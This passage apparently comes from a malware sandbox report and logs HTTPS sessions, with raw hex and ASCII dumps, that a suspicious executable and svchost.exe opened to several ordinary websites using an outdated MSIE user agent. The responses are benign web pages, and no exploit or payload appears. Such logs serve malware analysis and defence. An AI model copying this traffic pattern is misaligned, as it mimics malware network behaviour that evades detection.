                                                                                                                                                                                                                                                                          2023-07-05 06:07:56 UTC16781INData Raw: 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 34 33 30 2e 33 2c 39 34 61 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 33 33 2e 39 33 2c 38 36 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 3e 3c 2f 70 61 74 68 3e 3c
                                                                                                                                                                                                                                                                          Data Ascii: 34,2.34,0,0,1,430.3,94a2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M433.93,86.26a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.7,0,2,2,0,0,1,.15,2.68"></path><
                                                                                                                                                                                                                                                                          2023-07-05 06:07:56 UTC16797INData Raw: 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 36 32 2e 32 35 2c 31 34 33 2e 37 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: ,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.68"></path><path class="cls-9" d="M462.25,143.71a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:56 UTC16813INData Raw: 73 2d 39 22 20 64 3d 22 4d 34 37 38 2e 30 35 2c 32 36 2e 33 36 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 37 2e 38 34 2c 31 39 2e 38 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: s-9" d="M478.05,26.36a1.6,1.6,0,0,1-.72,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M477.84,19.88a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:56 UTC16829INData Raw: 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 30 36 2e 33 37 2c 38 33 2e 38 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 30 36 2e 31 35 2c 37 37 2e 33 33 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38
                                                                                                                                                                                                                                                                          Data Ascii: .67"></path><path class="cls-9" d="M506.37,83.81a1.6,1.6,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M506.15,77.33a1.6,1.6,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88
                                                                                                                                                                                                                                                                          2023-07-05 06:07:56 UTC16845INData Raw: 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 34 2e 36 39 2c 31 34 31 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 34 2e 34 37 2c 31 33 34 2e 37 38 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30
                                                                                                                                                                                                                                                                          Data Ascii: 71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M534.69,141.26a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M534.47,134.78a1.62,1.62,0,0,1-.73,2.0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:56 UTC16861INData Raw: 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 32 38 2c 31 37 2e 34 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 30 36 2c 31 31 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                          Data Ascii: 2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M550.28,17.43a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M550.06,11a1.62,1.62,0,0,1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:57 UTC17048INData Raw: 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 63 61 73 65 2f 77 6f 72 6b 73 2f 6d 61 69 6e 74 65 6e 61 6e 63 65 2e 68 74 6d 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 2d 70 65 72 66 6f 72 6d 61 6e 63 65 2d 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2e 2f 69 6d 61 67 65 73 2f 74 6f 70 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2d 69 6d 61 67 65 36 2e 70 6e 67 22 20 61 6c 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 6f 70 2d 70 65 72 66 6f 72 6d 61 6e 63 65 2d 63 6f 6e 74 65 6e 74 22 3e e9 9b 86 e5 90 88 e4 bd 8f e5 ae 85 3c 62 72 3e e6 b6 88 e9 98 b2 e8 a8 ad e5 82 99 e7 82 b9
                                                                                                                                                                                                                                                                          Data Ascii: 4"> <a href="case/works/maintenance.html"> <div class="top-performance-inner"><img src="./images/top/performance-image6.png" alt=""> <p class="top-performance-content"><br>


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          71192.168.2.65519188.114.96.7443C:\Users\user\Desktop\nhVJ8J5qOt.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6419OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: hyab.se
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6453INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:47 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Location: https://hyab.com
                                                                                                                                                                                                                                                                          Cache-Control: max-age=600
                                                                                                                                                                                                                                                                          Expires: Wed, 05 Jul 2023 06:17:47 GMT
                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ATFbMGfKtbKvWUeKNn7uTpDXHpSF7RBUtwZQfRU7mMPPd6s%2FXn8kQG%2FcJG2suNVgRZnsu82c5LbxhrgZnYeogNIDgFR2Uj0XgF%2BKAtw879NF2eGh%2FeHQhP3x"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 7e1d6e03a9898fd7-FRA
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6454INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6454INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          72192.168.2.6551391.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6419OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6454INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:09:19 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6455INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                          Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6471INData Raw: 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 20 61 6b 74 75 61 6c 6e 6f 73 63 69 20 20 2d 2d 3e 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 67 6c 6f 77 65 6b 31 22 3e 3c 68 32 3e 41 6b 74 75 61 6c 6e 6f c5 9b 63 69 3c 0d 0a 32 30 30 30 0d 0a 2f 68 32 3e 0d 0a 20 20 3c 21 2d 2d 20 6f 70 63 6a 65 20 6e 65 77 73 2e 20 2d 2d 3e 0d 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 67 5f 6d 65 6e 75 22 3e 0d 0a 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 67 5f 6d 65 6e 75 5f 6c 69 73 74 22 3e 0d 0a 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 70 61 6e 65
                                                                                                                                                                                                                                                                          Data Ascii: ntent-left --> <article id="wtxt" class="mainLeft"> ... aktualnosci --><div class="naglowek1"><h2>Aktualnoci<2000/h2> ... opcje news. --> <div class="nag_menu"> <ul class="nag_menu_list"> <li><a href="/w20/pane
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6487INData Raw: 65 6c 3d 22 7a 61 6f 62 73 65 72 77 6f 77 61 6c 65 73 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 33 39 36 32 2e 6a 70 67 3f 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 7a 61 6f 62 73 65 72 77 6f 77 61 6c 65 73 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 0d 0a 31 30 30 30 0d 0a 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 20 68 65 69 67 68 74 3a 37 34 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 31 30 34 2c 47 6c 75 63 68 6f 6e 69 65 6d 69 2e 68 74 6d 6c
                                                                                                                                                                                                                                                                          Data Ascii: el="zaobserwowales"><img src="/dokumenty/batony/3962.jpg?v=1657112618" alt="zaobserwowales" aria-hidden="true" /></a></div><div class="1000item" style="width:300px; height:74px;margin-bottom:10px"><a href="/w20/batony/4104,Gluchoniemi.html
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6503INData Raw: 72 c4 99 20 73 74 72 6f 6e 79 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 20 20 09 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2e 2d 2d 3e 20 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 3c 21 2d 2d 20 30 2e 30 34 36 32 38 32 20 2f 20 57 65 62 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 28 30 35 2e 30 37 2e 32 30 32 33 20 30 38 3a 30 39 29 20 2f 2f 2d 2d 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: r strony</span></a></div> ... GoToTop .--> </body></html>... 0.046282 / WebAdministrator (05.07.2023 08:09) //-->0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          73192.168.2.6557394.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6419OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: www.diamir.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6419INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:47 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 548
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6420INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          74192.168.2.6531949.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6454OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: nts-web.net
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6687INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:48 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 2599149
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Last-Modified: Tue, 08 Nov 2022 00:53:41 GMT
                                                                                                                                                                                                                                                                          ETag: "27a8ed-5eceaf89b8f40"
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6687INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 77 65 62 73 69 74 65 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 77 65 62 73 69 74 65 23 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="ja"> <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# website: http://ogp.me/ns/website#"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="wi
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6703INData Raw: 77 69 64 74 68 3a 31 2e 30 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 32 2c 2e 63 6c 73 2d 31 36 33 7b 66 69 6c 6c 3a 23 39 32 64 31 64 37 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 35 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 39 37 70 78 3b 7d 2e 63 6c 73 2d 31 36 32 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 31 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 33 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 32 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 34 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 35 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 35 7b 66 69 6c 6c 3a 23 65 65 65 39 34 32 3b 7d 2e 63 6c 73 2d 31 36 36 7b 66 69 6c 6c 3a 23 65 34 38 32 37 65 3b 7d 2e 63 6c 73 2d 31 36 37 7b 66 69 6c 6c 3a 23 38 36 63 64 64 34 3b 7d 2e 63
                                                                                                                                                                                                                                                                          Data Ascii: width:1.04px;}.cls-161,.cls-162,.cls-163{fill:#92d1d7;}.cls-161,.cls-165{stroke-width:0.97px;}.cls-162{stroke-width:1.15px;}.cls-163{stroke-width:1.25px;}.cls-164{stroke-width:1.54px;}.cls-165{fill:#eee942;}.cls-166{fill:#e4827e;}.cls-167{fill:#86cdd4;}.c
